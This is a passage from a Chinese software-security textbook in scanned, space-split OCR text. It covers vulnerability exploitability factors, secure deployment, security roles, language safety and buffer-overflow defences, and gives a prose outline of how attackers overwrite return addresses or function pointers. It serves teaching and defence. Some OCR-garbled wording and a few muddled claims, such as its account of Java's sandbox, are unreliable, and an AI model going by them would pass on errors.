(如 实现 新 的 功能 特性 和 解决 其 他 安全 问题 ) 进 行 优先 级 排序 。 

判定 漏洞 的 可 利用 性 包含 对 以 下 5 个 因素 的 权衡 : 

。 攻击 者 企图 探测 并 利用 这 个 漏洞 所 需 的 访问 权限 和 定位 技术 ; 

。 成 功利 用 此 漏洞 能 获得 的 访问 级 别 或 权限 ; 

。 探测 并 利用 此 漏洞 的 时 间 和 工作 量 因素 ; 

。 探测 和 利用 潜在 的 可 靠 性 ; 

。 探测 和 利用 尝试 行为 的 可 重复 性 。 

1. 时 间 


某 些 漏洞 可 能 需要 相当 长 的 时 间 来 探测 并 利用 。 这 可 能 表示 漏洞 利用 本 身 需要 传输 大 量 
的 数据 、 执 行 大 量 重复 的 尝试 或 使 用 相当 数量 的 计算 资源 。 这 类 需求 的 常见 例子 包括 发 送 数 
GB 的 通信 流 、 暴 力 攻击 内 存 地 址 或 破解 密 钥 。 如 果 加 密 漏 洞 需要 几 千年 的 时 间 来 计算 才能 
利用 的 话 ， 这 就 表示 这 种 风险 非常 低 。 
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2. 可 靠 性 和 再 现 性 


漏洞 的 严重 程度 取决 于 漏洞 可 被 攻击 者 利用 的 可 靠 性 和 再 现 性 如 何 。 可 靠 性 和 再 现 性 与 
漏洞 是 低级 别 的 还 是 高 级 别 的 有 关 。 

低级 别 漏洞 通常 会 破坏 运行 中 的 应 用 程序 或 编程 语言 运行 时 程序 的 状态 。 例 如 ， 缓 冲 区 
溢出 是 一 种 常见 的 低级 别 漏洞 ， 既 会 破坏 应 用 程序 的 运行 状态 ， 也 会 破坏 编程 语言 运行 时 的 
状态 。 出 于 这 种 原因 ， 这 类 漏洞 并 不 总 是 百分之百 地 可 再 现 或 者 说 百分之百 可 靠 。 这 些 漏洞 
可 能 会 导致 应 用 程序 崩溃 ， 也 可 能 需要 依赖 应 用 程序 或 进程 处 于 某 种 状态 时 才 可 能 导致 应 用 
程序 崩溃 ， 而 这 种 状态 对 于 攻击 者 来 说 是 无 法 预测 或 控制 的 。 
高 级 别 漏洞 通常 涉及 应 用 程序 的 逻辑 错误 。 常 见 的 高 级 别 漏洞 包括 : SQL 注入 、 跨 站 执 
行 脚本 以 及 其 他 由 程序 多 和 辑 错误 引起 的 漏洞 。 这 些 漏洞 不 倾向 于 导致 应 用 程序 骨 溃 ， 一 般 都 
非常 可 靠 且 可 再 现 。 高 级 别 漏洞 往往 都 很 简单 , 而 且 其 可 利用 性 是 完全 确定 的 。 像 Java、 PHP. 
C 和 C++ 这 样 的 语言 中 存在 的 高 级 别 漏洞 通常 总 是 可 以 可 靠 地 利用 。 

通常 情况 下 ， 高 级 别 漏洞 (如 目录 遍历 、SQL 注入 以 及 跨 站 执行 脚本 ) 的 可 靠 性 和 再 现 性 
高 ， 而 复杂 漏洞 (例如 破坏 程序 状态 的 缓冲 区 溢出 ) 的 可 靠 性 各 不 相同 。 这 很 大 程度 上 取决 于 
漏洞 本 身 ， 还 取决 于 构建 一 次 漏洞 利用 的 技能 和 投入 的 时 间 。 精 确 测量 某 个 漏洞 利用 的 可 再 
现 性 会 比较 困难 。 然 而 ， 一 条 基本 的 准则 就 是 栈 和 数据 段 溢出 的 漏洞 利用 倾向 于 具有 高 可 再 
现 性 ， 反 之 ， 堆 溢出 漏洞 利用 的 可 再 现 性 就 较 低 。 重 要 的 是 ， 要 注意 应 用 程序 是 否 会 重新 启 
动 自 己 ， 这 是 一 种 重要 的 因素 。 如 果 攻 击 者 可 以 多 次 尝试 漏洞 利用 ， 堆 溢出 漏洞 利用 的 可 靠 
性 和 可 再 现 性 可 能 变 得 相当 高 。 

3. 访问 


利用 漏洞 通常 能 为 攻击 者 提供 比 之 前 更 多 的 访问 权 。 通 过 漏洞 得 到 的 这 种 访问 授权 ， 其 
形式 可 能 是 用 户 权 限 、 网 络 访问 或 对 其 他 保护 资源 的 访问 权 。 在 一 个 简单 案例 中 ， 漏 洞 可 能 
允许 攻击 者 直接 从 Web 服务 器 的 文件 系统 中 读 取 文件 ， 包 括 那 些 位 于 这 个 Web 服务 器 根 文 
档 目录 之 外 的 文件 即 “ 目 录 遍 历 ”)， 或 者 如 同 PHP 和 JSP 页 面 这 样 的 服务 器 端 解释 的 源 代 
码 文件 即 “ 源 代码 泄露 ”)。 这 种 漏洞 会 为 攻击 者 提供 更 多 信息 ， 攻 击 者 可 使 用 这 些 信息 来 
攻击 系统 ， 不 过 ， 利 用 漏洞 并 不 会 得 到 完全 的 系统 访问 权 。 然 而 ， 如 果 远 程 攻 击 者 可 利用 漏 
洞 来 获得 UNIX 影子 密码 文件 ， 并 将 其 破解 而 获得 有 效 的 系统 身份 信息 ， 那 么 漏洞 可 导致 攻 
击 者 获得 系统 访问 权 。 

另外 一 系列 漏洞 是 那些 导致 “命令 执行 ”或 “任意 代码 执行 ”的 漏洞 。 命 令 行 漏洞 可 能 
会 出 现在 这 样 的 Web 应 用 程序 中 : 程序 未 能 正确 地 对 输入 的 数据 进行 无 害处 理 , 而 将 这 些 输 
入 用 于 某 个 命令 行程 序 中 ， 使 得 攻击 者 能 在 其 中 注入 自己 的 命令 并 得 以 执行 。 任 意 代码 执行 
漏洞 包括 缓冲 区 溢出 漏洞 和 格式 化 字符 串 漏洞 ， 这 类 漏洞 允许 远程 攻击 者 将 应 用 程序 的 执行 
重 定 向 到 自己 提供 的 机 器 代码 。 这 将 导致 攻击 者 获得 正在 运行 的 程序 的 全 部 权限 ， 这 种 情况 
下 ， 应 用 程序 可 能 拥有 超级 用 户 或 Administrator 权限 ， 或 者 没有 任何 权限 而 运行 ;或 者 先前 
的 权限 被 撤消 ， 转 而 运行 于 一 种 较 低 权限 的 状态 。 然 而 ， 有 时 权限 并 没有 正确 地 或 完全 地 撤 
消 ， 并 可 能 在 攻击 者 控制 这 个 应 用 程序 之 后 就 立即 恢复 。 
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其 他 常见 漏洞 ， 如 SQL 注入 和 跨 站 执行 脚本 ， 将 导致 各 种 不 同 的 访问 授权 等 级 。 一 个 
Web 应 用 程序 中 存在 的 SQL 注入 漏洞 可 能 会 使 得 远程 攻击 者 获得 该 应 用 程序 数据 库 的 访问 
权限 。 在 得 到 良好 安全 防护 的 部 署 中 ， 这 可 能 是 一 个 数据 库 上 无 特权 的 账户 ， 这 个 账户 只 有 
对 该 应 用 程序 数据 的 访问 权 。 然 而 对 于 攻击 者 来 说 ， 可 能 这 就 足够 了 ， 因 为 有 了 这 种 权限 
就 能 读 取 或 修改 该 应 用 程序 的 任何 数据 。 某 些 数据 库 配 置 可 能 还 允许 更 多 的 访问 权限 。 

跨 站 执行 脚本 漏洞 使 得 攻击 者 可 在 存在 漏洞 的 Web 站 点 的 安全 环境 下 , 将 可 执行 脚本 代 
码 或 其 他 任何 HTML 代码 注入 到 受害 用 户 的 Web 浏览 器 中 。 根 据 该 Web 站 点 所 能 完成 任务 
的 差别 ， 攻 击 者 可 获得 各 种 不 同 的 访问 权限 级 别 。 

4. 定位 

要 利用 一 个 漏洞 ， 攻 击 者 必须 能 与 这 个 存在 漏洞 的 应 用 程序 进行 交互 ， 并 能 访问 到 含有 
该 漏洞 的 代码 。 是 否 可 以 通过 Intemet 进行 攻击 由 这 个 应 用 程序 是 不 是 网 络 软件 以 及 使 用 哪 
种 协议 进行 通信 决定 。 某 些 应 用 程序 使 用 像 IP 组 播 (Multicasb 这 样 的 协议 ， 而 这 种 协议 典型 
的 情况 下 是 不 能 被 路 由 器 转发 到 其 他 子 网 的 。 还 有 许多 应 用 程序 采用 了 自 定义 协议 ， 而 防火 
墙 可 能 不 允许 这 种 协议 穿 过 。 此 外 ， 某 些 应 用 程序 使 用 了 HTTP 这 样 常见 的 Intemet 协议 ， 
因而 这 也 就 使 得 攻击 可 以 穿 过 Intemet 防火 墙 得 以 执行 。 一 般 来 讲 ， 可 通过 Internet 进行 攻击 
时 风险 最 高 ， 因 为 这 种 攻击 可 在 任何 位 置 发 起 。 

- 旦 攻击 者 能 够 访问 到 存在 漏洞 的 应 用 程序 ， 他 必定 也 能 访问 到 存在 漏洞 的 代码 。 这 里 
重要 的 屏障 就 是 鉴别 身份 信息 以 及 其 他 目标 特有 的 知识 。 如 果 这 个 漏洞 在 登录 系统 之 前 就 会 
出 现 的 话 ， 比 起 要 求 使 用 管理 身份 来 利用 的 漏洞 来 说 ， 的 确 造 成 了 较 高 风险 。 此 外 ， 攻 击 者 
可 能 需要 某 些 其 他 目标 特有 的 知识 ， 比 如 该 应 用 程序 正在 监听 的 动态 选择 的 TCP 端口 、Web 
应 用 程序 中 的 某 个 站 点 特有 的 路 径 或 其 他 任何 完成 协议 协商 需要 的 参数 。 例 如 ， 某 个 自 定义 
协议 可 能 要 求 提前 配置 好 某 些 加 密 参数 ， 并 可 能 不 加 通告 地 舍弃 那些 未 使 用 的 正确 算法 、 密 
钥 、 密 钥 长 度 或 初始 化 向 量 等 。 

最 后 ， 了 解 攻 击 是 “主动 的 ”还 是 “被 动 的 ”也 很 重要 。 攻 击 者 可 对 已 知 目标 发 起 攻击 ， 
也 可 以 等 待 某 个 用 户 的 特定 活动 之 后 再 采取 行动 。 例 如 ， 大 多 数 服 务 器 软件 中 的 漏洞 都 允许 
主动 攻击 。 攻 击 者 可 在 任何 时 间 发 起 攻击 。 与 此 相对 的 是 被 动 攻击 ， 比 如 针对 某 个 Web 浏览 
器 漏洞 进行 攻击 。 攻 击 者 必须 强制 某 个 访问 某 个 Web 服务 器 的 用 户 处 于 控制 之 下 ,才能 利用 
这 个 漏洞 。 通 常 来 讲 ， 允 许 主动 攻击 的 漏洞 比 被 动 攻 击 的 漏洞 有 更 大 的 风险 。 

每 个 漏洞 的 风险 是 解决 各 个 漏洞 之 间 以 及 与 其 他 开发 任务 之 间 排 定 优先 顺序 的 依据 。 可 
利用 性 需要 周期 性 重新 评估 ， 这 是 因为 ， 随 着 时 间 的 流逝 ， 漏 洞 的 可 利用 性 总 是 变 得 更 加 容 
易 ， 例 如 密码 机 制 变 得 比 以 前 更 脆弱 ， 人 们 也 推出 了 新 的 加 密 技术 。 

3.1.8 软件 的 安全 部 署 

计算 机 软件 的 部 署 指 计算 机 软件 投入 使 用 过 程 中 的 所 有 相关 环节 ， 部 署 软件 系统 涉及 从 

计算 机 软件 源头 (可 以 理解 为 服务 器 端 ) 将 软件 组 成 部 分 传递 或 复制 到 客户 端 ， 一 旦 软件 被 部 


署 ， 客 户 就 能 使 用 软件 系统 。 
安全 地 部 署 和 维护 应 用 程序 的 过 程 应 放 在 生命 周期 的 最 后 。 当 然 ， 需 要 在 开始 时 就 为 使 
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应 用 程序 能 被 安全 地 部 署 而 进行 设计 。 安 全 部 署 意味 着 软件 安装 时 使 用 了 安全 的 默认 值 ， 文 
件 许可 权限 经 过 了 适当 设置 ， 并 在 应 用 程序 配置 中 使 用 了 安全 设置 。 

软件 部 署 的 结果 对 软件 系统 运行 时 的 性 能 ， 如 反馈 时 长 、 系 统 稳定 性 、 输 入 输出 的 数据 
量 、 易 用 性 、 安 全 指标 等 ， 有 很 重要 的 影响 ,而 且 这 种 影响 作用 对 分 布 式 软件 系统 更 加 明显 。 
因为 在 分 布 式 软件 系统 中 ， 软 件 系统 往往 需要 根据 分 布 式 平台 所 运行 的 应 用 不 断 地 微调 、 迭 
代 、 运 维 、 扩 充 软件 的 设备 设置 信息 ， 从 而 达到 优化 分 布 式 系统 工作 效率 的 目标 。 分 布 式 软 
件 系统 的 编译 、 唤 醒 、 反 唤醒 、 和 迭代 、 环 境 适 应 、 反 向 提出 、 删 除 等 活动 可 以 看 成 分 布 式 软 
件 系统 的 全 局 部 署 过 程 ， 随 用 户 需 求 和 分 布 式 运行 环境 的 变化 而 变化 。 近 年 来 ， 如 何 实现 软 
件 系统 的 优化 部 署 是 软件 部 署 和 分 布 式 系统 研究 的 重要 内 容 。 

随 着 软件 系统 复杂 性 和 软件 运行 环境 复杂 性 的 不 断 增 加 ， 软 件 部 署 在 软件 生命 周期 中 变 
得 越 来 越 重 要 。 尽 管 软件 部 署 受 到 越 来 越 多 研究 人 员 的 关注 ， 但 由 于 软件 自身 复杂 性 和 软件 
部 署 环 境 复杂 性 的 增加 等 因素 ， 软 件 部 署 目前 还 存在 以 下 几 个 方面 的 问题 ; 

1) 软件 规模 庞大 。 随 着 科学 技术 的 进步 ， 计 算 机 软件 系统 的 规模 越 来 越 大 ， 复 杂 性 迅速 
攀升 。 计 算 机 软件 系统 常 由 众多 对 象 或 组 件 构成 ， 多 个 对 象 或 组 件 之 间 存 在 相互 依赖 关系 ， 
这 些 依赖 关系 直接 影响 软件 部 署 过 程 中 的 活动 。 

2) 工作 环境 多 样 性 。 随 着 网 络 技术 的 快速 发 展 , 计算 机 软件 系统 的 部 署 环 境 由 原来 独立 、 
非 动态 、 统 一 标准 的 环境 转变 为 开放 、 非 静态 、 多 种 构架 的 环境 ， 这 种 开放 、 非 静态 、 多 种 
构架 的 网 络 环境 给 计算 机 软件 的 部 署 带 来 了 难度 。 例 如 ， 软 件 部 署 不 仅 需要 考虑 对 数据 文件 
的 需求 状态 ， 还 要 考虑 组 件 之 间 的 数据 信息 等 传递 情况 并 兼顾 服务 器 的 工作 环境 等 ， 提 升 了 
计算 机 软件 部 署 的 复杂 度 。 

3) 自 调整 问题 。 软件 的 不 断 发 展 需要 软件 部 署 能 够 进行 更 迭 操 作 , 为 了 满足 用 户 功能 性 
方面 的 需求 变化 和 计算 机 工作 环境 的 变化 ， 软 件 部 署 需要 进行 自我 调整 。 因 此 ， 完 整 的 部 署 
过 程 是 软件 自我 调整 的 过 程 。 

4) 适应 问题 。 软件 部 署 活动 之 间 是 有 关联 的 , 一 个 活动 的 发 生 可 能 需要 其 他 活动 的 发 生 
为 前 提 ， 也 可 能 导致 其 他 活动 的 发 生 。 例 如 ， 在 服务 器 端 组 件 进行 更 新 或 再 配置 之 前 ， 必 须 
首先 反 激 活 所 有 客户 端的 组 件 ， 以 免 影响 正常 的 交易 。 因 此 ， 适 应 问题 是 软件 部 署 中 的 一 个 
重要 问题 。 

5) 安全 问题 。 互 联网 的 发 展 非常 迅速 ， 软 件 的 部 署 也 有 了 更 多 的 数据 机 密 性 、 访 问 控制 
和 统一 规范 性 等 安全 方面 的 问题 。 例 如 ， 计 算 机 软件 在 编译 执行 和 版 本 更 迭 中 需要 一 定 的 机 
密 性 ， 这 需要 网 络 传输 协议 的 内 容 不 被 非法 窃取 。 另 外 ， 由 于 不 同 的 分 支 或 组 织 具 有 不 同 的 
权限 ， 软 件 部 署 还 要 解决 身份 验证 的 问题 。 最 后 ， 由 于 软件 系统 部 署 在 多 台 服 务 器 中 ， 从 而 
可 以 保证 资源 文件 信息 的 完整 性 以 避免 资源 文件 的 破坏 或 丢失 情况 发 生 。 

此 外 ， 必 须 对 安全 的 部 署 进 行经 常 性 监控 ， 同 时 ， 必 须 对 漏洞 进行 管理 。 


3.4.9 软件 安全 开发 中 的 角色 和 职责 


安全 到 底 是 谁 的 职责 ， 这 个 问题 往往 并 不 是 那么 清晰 。 为 有 效 开展 安全 测试 工作 ， 就 必 
澄清 角色 和 职责 问题 。 在 安全 的 软件 开发 生命 周期 中 ， 安 全 是 许多 人 的 职责 。 不 能 将 安全 
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仅 依赖 于 网 络 小 组 安装 入 侵 检测 系统 和 防火 墙 ， 以 及 运行 一 些 用 于 安全 的 网 络 工具 。 重 要 的 
是 要 对 角色 和 职责 进行 定义 ， 这 样 ， 每 个 人 都 知道 由 谁 测试 什么 内 容 ， 举 例 来 讲 ， 这 样 就 可 
以 使 得 应 用 程序 测试 团队 不 再 假定 网 络 测试 工具 也 会 捕捉 到 应 用 程序 的 安全 漏洞 。 

项 目 经 理 或 产品 经 理应 该 编写 安全 策略 。 如 果 可 能 的 话 ， 这 些 安全 策略 可 以 基于 指定 的 
相关 标准 来 编写 。 如 果 没 有 专门 的 安全 角色 来 负责 安全 认证 的 话 ， 产 品 经 理 或 项 目 经 理 还 要 
负责 处 理 安全 认证 过 程 的 工作 。 架 构 师 和 开发 人 员 负 责 提 供 设计 和 实现 细节 、 确 定 和 研究 安 
全 威胁 以 及 执行 代码 评审 工作 。 测 试 人 员 了 驱动 系统 的 关键 分 析 、 参 加 安全 建 模 工作 、 确 定 和 
研究 安全 威胁 并 构建 白 盒 和 黑 盒 测试 。 项 目 经 理 管理 计划 进度 ， 并 控制 每 份 文档 及 其 日 期 。 
安全 过 程 经理 可 检查 指导 安全 建 模 、 安 全 评估 以 及 安全 编码 培训 。 


32 ”软件 安全 编程 


面 对 越 来 越 频 繁 的 软件 安全 隐患 带 来 的 损失 ， 对 软件 的 开发 者 一 一 软件 工程 师 ， 提 出 了 
更 高 的 要 求 ， 要 求 程序 员 能 编写 出 错误 更 少 的 程序 ， 并 能 及 时 修复 软件 中 出 现 的 突 发 问题 ， 
切实 为 软件 使 用 者 服务 。 本 节 讲 解 的 安全 编程 技术 旨 在 解决 这 些 问题 。 安 全 编程 是 软件 质量 
的 重要 保证 ， 在 软件 开发 和 程序 设计 中 占有 重要 地 位 。 

不 过 ， 实 际 的 软件 工程 中 ， 安 全 隐患 的 出 现 往往 来 源 于 多 个 方面 ， 给 软件 系统 带 来 的 危 
害 也 有 很 多 方面 。 安 全 问题 的 出 现 ， 由 于 原因 众多 ， 而 某 些 安全 问题 又 具有 不 间断 发 生 、 难 
于 调试 等 特点 ， 很 难 用 单纯 的 理论 来 全 面 阐述 安全 编程 问题 。 基 于 这 个 考虑 ， 安 全 编程 的 
内 容 只 能 针对 各 个 侧面 来 进行 阐述 ， 如 异常 情况 下 的 安全 、 线 程 操作 中 的 安全 、 数 据 安全 
加 密 等 。 


3.2.1 软件 开发 语言 
在 我 们 开始 讨论 安全 编程 之 前 ， 先 了 解 一 下 当前 常见 的 几 种 开发 语言 自身 的 安全 性 : 


1) C/C++ 
1972 年 ， 贝 尔 实验 室 Dennis Ritchie 开发 了 C 语言 。 从 此 C 语言 成 为 专业 程序 员 使 用 的 
主流 语言 ， 也 成 为 UNIX 操作 系统 的 主流 语言 。 后 来 在 C 语言 中 融入 了 面向 对 象 的 特性 ， 如 
封装 和 继承 ， 最 初 成 为 C classes，1983 年 该 语言 被 改称 为 C++。 
由 于 C/C++ 是 在 Intemet 之 前 发 展 起 来 的 , 安全 性 是 后 来 补充 进去 的 。 C/C++ 缺乏 自动 范 
围 检 测 , 因此 其 缺乏 缓冲 区 溢出 攻击 的 灵敏 性 。 攻击 者 可 以 通过 应 用 程序 读 取 固定 长 度 的 值 ， 
然后 发 送 更 长 的 值 ， 来 确定 应 用 程序 中 是 否 存 在 栈 或 堆 溢 出 ， 以 及 是 否 访问 了 被 保护 的 内 
存 等 。 


2) Java 

Java 是 SUN 公司 开发 的 面向 对 象 程序 设计 语言 ， 它 具有 平台 无 关 性 和 自动 收集 垃圾 等 
功能 ， 并 且 保 留 了 C/C++ 类 似 的 语法 。Java 相对 于 C/C++， 它 解决 了 后 者 存在 的 漏洞 ， 提 供 
了 成 熟 的 内 存 管理 和 数组 边界 检测 机 制 。 不 仅 如 此 ，Java 还 使 用 了 沙 盒 的 概念 。 沙 盒 技术 是 
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浏览 器 和 其 他 应 用 程序 中 保护 安全 的 一 种 组 件 关系 设计 模式 。“ 沙 盒 ”技术 是 发 现 可 疑 行为 
后 让 程序 继续 运行 ， 当 发 现 的 确 是 病毒 时 才 会 终止 。“ 沙 盒 ” 技 术 的 实践 运用 流程 是 ， 让 疑 
似 病 毒 文件 的 可 疑 行为 在 虚拟 的 “ 沙 盒 ” 里 充分 表演 ，“ 沙 盒 ”会 记 下 它 的 每 一 个 动作 ; 当 
疑似 病毒 充分 暴露 了 其 病毒 属性 后 ，“ 沙 盒 ” 就 会 执行 “ 回 滚 ” 机 制 : 将 病毒 的 痕迹 和 动作 
抹 去 ， 恢 复 系统 到 正常 状态 。Java 使 用 沙 盒 技术 ， 不 但 保护 了 内 存 ， 还 使 沙 盒 外 的 其 他 数据 
受到 了 保护 。 


3) C# 

C# 是 微软 公司 发 布 的 语言 。 它 也 是 一 种 平台 无 关 、 面 向 对 象 的 开发 语言 。C# 的 安全 性 是 
作为 NET 运行 时 的 一 部 分 来 实现 的 。NET 提供 了 一 个 Web 服务 框架 ， 在 该 框架 中 用 不 同 语 
言 可 以 进行 交互 。 因 此 C# 提 供 了 以 下 几 个 内 部 安全 特性 : 

。 许可 权 : 命名 空间 负责 处 理 所 有 的 代码 许可 功能 。 

。 安全 机 制 : 管理 员 可 以 创建 安全 机 制 来 限制 代码 能 执行 的 操作 。 

* Principal: 一 个 principal 完成 用 户 的 一 个 动作 。Principal 是 使 用 principal 代理 提供 的 

凭证 来 完成 认证 的 。.NET 确保 了 代码 只 能 完成 授权 执行 的 操作 。 

。 类 型 安全 ，C# 提 供 了 可 选 的 类 型 安全 ， 以 保证 代码 只 能 访问 已 授权 的 内 存 位 置 。 


4) Perl 

Perl 是 由 流行 的 基于 UNIX 的 脚本 语言 引擎 的 特性 和 功能 组 合成 的 核心 语言 , 是 Sh, sed 
和 awk 等 特性 与 正则 表达 式 的 结合 。 大 多 数 的 安全 团体 都 采用 Perl 脚本 语言 ， 这 主要 是 因为 
Perl 平 台 的 独立 性 、 简 单 的 套 接 字 结 构 、 利 用 二 进 制 编码 的 能 力 和 流行 广泛 等 特性 。 
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任何 开发 语言 都 不 能 避 开 对 内 存 的 使 用 ， 所 以 内 存 安全 关系 到 整个 程序 的 安全 ， 在 软件 
开发 和 程序 设计 中 占有 重要 地 位 。 如 果 程 序 员 稍 微 疏 包 ， 很 容易 出 现 安全 隐患 。 

内 存 数 据 涵 盖 了 很 多 方面 ， 如 字符 串 、 数 组 、 整 数 都 在 内 存 中 以 不 同形 式 存在 ， 它 们 在 
被 操作 的 过 程 中 ， 具 有 哪些 特点 ， 什 么 样 的 操作 能 够 产生 攻击 ， 这 些 都 是 程序 员 编程 时 需要 
重视 的 问题 。 

内 存 安全 主要 是 缓冲 区 溢出 问题 。 缓 冲 区 溢出 指 的 是 一 种 常见 且 危 害 很 大 的 系统 攻击 手 
段 ， 通 过 向 程序 的 缓冲 区 写 入 超出 其 长 度 的 内 容 ， 造 成 缓冲 区 的 溢出 ， 从 而 破坏 程序 的 堆栈 ， 
使 程序 转 而 执行 其 他 的 指令 ， 以 达到 攻击 的 目的 。 该 问题 在 字符 串 复制 或 其 他 函数 使 用 时 很 
容易 出 现 ， 处 理 不 当 ， 会 给 程序 留 下 安全 漏洞 ， 成 为 攻击 的 目标 ;其 次 是 整数 溢出 问题 ， 整 
数 由 于 其 保存 的 特殊 性 ， 某 些 特殊 的 计算 可 能 产生 奇怪 的 结果 ， 如 果 处 理 不 当 ， 照 样 会 成 为 
隐患 另外， 数组 越界 、 字 符 串 格式 化 都 是 需要 重点 考虑 的 问题 。 

缓冲 区 溢出 攻击 ， 由 于 实现 起 来 比较 方便 ， 已 经 成 为 一 种 比较 常见 的 安全 攻击 手段 。 因 
此 ， 相 对 于 其 他 漏洞 ， 缓 冲 区 溢出 漏洞 比较 普遍 。 

攻击 者 可 以 通过 很 多 手段 利用 缓冲 区 溢出 漏洞 并 且 进 行 攻击 。 一 般 来 说 ， 利 用 缓冲 区 溢 
出 攻击 的 目的 是 使 攻击 者 取得 某 些 程序 的 控制 权 ， 执 行 某 种 特权 功能 ， 实 现 非法 操作 ;极端 
情况 下 ， 如 果 该 程序 具有 管理 员 权限 ， 那 就 相当 于 控制 了 整个 主机 。 
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攻击 者 为 了 达到 目的 ， 一 般 情况 下 ， 攻 击 行为 分 为 两 步 进行 。 

第 一 步 : 在 程序 的 地 址 空间 放 入 一 些 攻击 性 数据 ， 故 意 让 缓冲 区 溢出 。 该 方法 中 一 般 有 
两 种 攻击 方式 : 

1) 直接 输入 法 。 攻 击 者 向 被 攻击 的 程序 输入 一 个 字符 串 ， 让 缓冲 区 溢出 ， 程 序 会 把 这 个 
字符 串 放 到 缓冲 区 里 。 而 该 字符 串 中 包含 某 个 指令 序列 ， 攻 击 者 因而 猜测 出 可 以 攻击 的 漏洞 
地 址 。 

2) 传递 参数 法 。 这 种 情况 下 ， 攻 击 者 想 要 执行 的 代码 存在 于 漏洞 程序 中 ， 只 需要 传递 一 
些 参数 就 可 以 让 它 运行 ， 例 如 ， 攻 击 代码 要 求 执行 exec(“ 某 个 命令 ”)， 而 在 被 攻击 程序 的 
库 中 有 一 个 函数 为 exec(arg)， 那 么 攻击 者 只 需要 将 命令 参数 传 给 被 攻击 程序 。 

第 二 步 : 精心 设计 溢出 的 数据 ， 让 程序 执行 攻击 者 预想 的 功能 ， 也 就 是 改变 程序 的 执行 
流程 ， 跳 转 到 攻击 者 安排 的 攻击 代码 。 

让 程序 跳 转 到 相应 的 程序 代码 ， 一 般 情 况 下 有 如 下 方法 : 

。 ， 利 用 另 一 个 函数 的 返回 地 址 。 函 数 调 用 时 ， 堆 栈 中 会 留 下 函数 结束 时 返回 的 地 址 ， 

指示 函数 结束 后 会 执行 的 功能 。 攻 击 者 可 通过 缓冲 区 溢出 ， 改 变 程序 的 返回 地 址 ， 
使 返回 地 址 为 攻击 代码 。 

。 直接 利用 函数 指针 。 由 于 函数 指针 可 用 来 定位 函数 的 位 置 ， 攻 击 者 只 需要 在 函数 指 
针 附 近 将 缓冲 区 溢出 ， 用 攻击 函数 的 指针 来 覆盖 原 函 数 指针 ， 达 到 攻击 目的 。 

解决 缓冲 区 溢出 的 方法 有 如 下 几 种 : 

。 积极 检查 边界 。 由 于 C 和 C++ 人 允许 任意 的 缓冲 区 溢出 ， 没 有 任何 的 缓冲 区 溢出 边界 
检测 机 制 来 进行 限制 ， 因 此 一 般 情况 下 ， 所 有 开发 者 需要 手动 在 自己 的 代码 中 添加 
边界 检测 机 制 .不 过 , 也 有 一 些 优化 技术 来 减少 手工 检查 的 次 数 , 如 使 用 Richard Jones 
和 Paul Kelly 开发 的 gcc 补丁 、 利 用 Compaq 的 C 编译 器 等 。 

。 不 让 攻击 者 执行 缓冲 区 内 的 命令 。 这 种 方法 使 得 攻击 者 即使 在 被 攻击 者 的 缓冲 区 中 
植 入 了 执行 代码 后 ， 也 无 法 执行 被 植 入 的 代码 。 

* 编写 风格 良好 的 代码 。 养 成 习惯 ， 不 要 因为 一 味 追 求 程序 性 能 ， 而 编写 一 些 安全 隐 
患 较 多 的 代码 , 特别 是 不 要 使 用 一 些 可 能 存在 漏洞 的 API 减少 漏洞 发 生 的 可 能 。 可 
用 一 些 查 错 工具 ， 限 制 一 些 可 能 具有 缓冲 区 溢出 漏洞 攻击 的 函数 的 调用 (如 strcpy 和 
sprintf 等 )。 

。 程序 指针 检查 。 程 序 指针 检查 不 同 于 边界 检查 ， 程 序 指针 检查 是 一 旦 修改 了 程序 指 
针 ， 就 会 被 检测 到 ， 被 改变 的 指针 将 不 被 使 用 。 这 样 ， 即 使 攻击 者 成 功 地 改变 了 程 
序 的 指针 ， 因 为 系统 事先 检测 到 了 指针 的 改变 ， 这 个 指针 也 将 不 会 被 使 用 ， 达 不 到 
攻击 的 目的 。 

我 们 将 在 4.4 中 详细 介绍 缓冲 区 溢出 在 应 用 中 的 安全 问题 。 


3.23 ”进程 与 线程 安全 


进程 和 线程 是 两 个 范围 不 同 的 概念 。 进 程 是 程序 在 计算 机 上 的 一 次 执行 活动 ， 是 操作 系 
统 进行 资源 分 配 的 单位 ， 通 俗 地 讲 ， 是 正在 执行 的 程序 。 
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线程 是 进程 中 的 一 个 实体 ， 是 被 系统 独立 调度 和 分 派 的 基本 单位 ， 它 可 与 同属 一 个 进程 
的 其 他 线程 共享 进程 所 拥有 的 全 部 资源 。 一 个 线程 可 以 创建 和 撤消 另 一 个 线程 ， 同 一 进程 中 
的 多 个 线程 之 间 可 以 并 发 执行 。 实 际 上 ， 多 线程 最 直观 的 说 法 是 ， 让 应 用 程序 看 起 来 好 像 同 
时 能 做 好 几 件 事情 。 在 实际 应 用 开发 过 程 中 ， 经 常会 出 现 一 个 程序 看 起 来 同时 做 好 几 件 事情 
的 情况 ， 如 : 

e 程序 进行 一 个 用 时 较 长 的 计算 ,希望 该 计算 进行 时 ， 程 序 还 可 以 做 其 他 事情 ; 

。 软件 要 能 够 接受 多 个 客户 的 请 求 ， 而 让 客户 感觉 不 出 等 待 ; 

。 媒体 播放 器 在 播放 歌曲 的 同时 也 能 下 载 电影 ; 

。 财务 软件 在 后 台 进 行 财 务 汇总 的 同时 还 能 接受 终端 的 请 求 等 ; 

。 这 些 情况 下 ， 多 线程 就 能 够 起 到 巨大 作用 。 

线程 与 进程 的 开发 和 相关 操作 ， 在 程序 设计 中 具有 重要 地 位 ， 线 程 与 进程 的 安全 和 系统 
的 安全 息息相关 。 

一 般 说 来 ， 线 程 的 安全 性 问题 主要 来 源 于 其 运行 的 并 发 性 和 对 资源 的 共享 性 ;进程 的 安 
全 性 问题 主要 在 应 用 级 别 ， 在 于 其 对 系统 的 威胁 性 ， 不 过 对 于 系统 软件 的 开发 者 ， 进 程 安全 
的 考虑 需要 更 加 深入 。 

每 个 程序 至 少 自动 拥有 一 个 线程 ， 称 为 主线 程 。 当 程序 加 载 到 内 存 时 ， 启 动 主线 程 。 这 
是 由 于 多 线程 的 机 制 实际 上 相当 于 CPU 交替 分 配给 不 同 的 代码 段 来 运行 : 也 就 是 说 , 某 一 个 
时 间 片 ， 某 线程 运行 ， 下 一 个 时 间 片 ， 另 一 个 线程 运行 ， 各 个 线程 都 有 抢占 CPU 的 权利 ， 由 
操作 系统 决定 哪个 线程 进行 抢占 。 由 于 时 间 片 的 轮转 非常 快 ， 用 户 感觉 不 出 各 个 线程 抢占 
CPU 的 过 程 ， 看 起 来 好 像 计算 机 在 “同时 ”做 好 几 件 事情 。 

